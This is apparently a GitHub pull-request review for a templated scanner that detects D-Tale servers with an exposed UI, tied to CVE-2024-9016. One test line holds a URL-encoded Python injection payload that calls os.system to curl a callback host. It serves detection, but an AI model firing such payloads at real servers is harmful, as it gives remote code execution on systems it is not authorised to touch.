PRP: D-tale Server exposed UI #673
Conversation
templated/templateddetector/plugins/cve/2024/Dtale_CVE_2024_9016.textproto
Outdated
Show resolved
Hide resolved
| } | ||
| severity: CRITICAL | ||
| title: "Remote code execution affecting DocsGPT (CVE-2024-9016)" | ||
| description: "D-Tale is a visualizer for Pandas data structures. Users hosting D-Tale publicly can be vulnerable to remote code execution allowing attackers to run malicious code on the server." |
There was a problem hiding this comment.
Please provide a more precise description and recommendation to match the CVE.
There was a problem hiding this comment.
@tooryx I updated the PRP to expose UI I tested the latest version of D-tale, and it is a feature actually( the code injection). Also, the CVE is rejected in the meantime that I submitted the AI PRP.
CVE-2024-9016
templated/templateddetector/plugins/cve/2024/Dtale_CVE_2024_9016.textproto
Outdated
Show resolved
Hide resolved
templated/templateddetector/plugins/cve/2024/Dtale_CVE_2024_9016_test.textproto
Outdated
Show resolved
Hide resolved
| uri: "/dtale/chart-data/112233?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20{{ T_CBS_URI }}%20%23%22%22%22%29" | ||
| status: 200 | ||
| body_content: "\"error\":\"" | ||
| } | ||
| ] |
There was a problem hiding this comment.
Indeed, there was a bug. I have pushed a fix internally and it should be visible publicly within 24 hours.
VickyTheViking
changed the title
VickyTheViking
changed the title
There was a problem hiding this comment.
Hi @VickyTheViking, thanks for your contribution.
I left a couple of comments down below. Feel free to reach out if you have any questions.
| headers: [ | ||
| { name: "Content-Type" value: "multipart/form-data; boundary=----geckoformboundaryb38fffc548bd5dad82328985c3f223d4" } | ||
| ] | ||
| data: '------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="simple-dtale-data.csv"; filename="simple-dtale-data.csv"\r\nContent-Type: text/csv\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="header"\r\n\r\ntrue\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separatorType"\r\n\r\ncomma\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separator"\r\n\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4--\r\n' |
There was a problem hiding this comment.
On my side, this causes the application to return {"error":"No columns to parse from file","success":false,...}, which makes the entire detection fail. I fixed it by adding some dummy data.
| headers: [ | |
| { name: "Content-Type" value: "multipart/form-data; boundary=----geckoformboundaryb38fffc548bd5dad82328985c3f223d4" } | |
| ] | |
| data: '------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="simple-dtale-data.csv"; filename="simple-dtale-data.csv"\r\nContent-Type: text/csv\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="header"\r\n\r\ntrue\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separatorType"\r\n\r\ncomma\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separator"\r\n\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4--\r\n' | |
| headers: [ | |
| { name: "Content-Type" value: "multipart/form-data; boundary=-" } | |
| ] | |
| data: '---\nContent-Disposition: form-data; name="data.csv"; filename="data.csv"\nContent-Type: text/csv\n\ntest,data\n\n---\nContent-Disposition: form-data; name="header"\n\ntrue\n---\nContent-Disposition: form-data; name="separatorType"\n\ncomma\n---\nContent-Disposition: form-data; name="separator"\n\n-----\n' |
Please run the detector on your side and confirm if you can reproduce the issue and the fix.
| ] | ||
| } | ||
| } | ||
| } |
There was a problem hiding this comment.
I would suggest linking a cleanup action here so that no dirty data are left behind by the detector. It should be sufficient to issue a request like GET /dtale/cleanup-datasets?dataIds={{dataid}}
| } | |
| } | |
| cleanup_actions: "cleanup_data" |
Hi, This PR is according to the recent Issue #561
You can set up a secure and vulnerable instance here: google/security-testbeds#150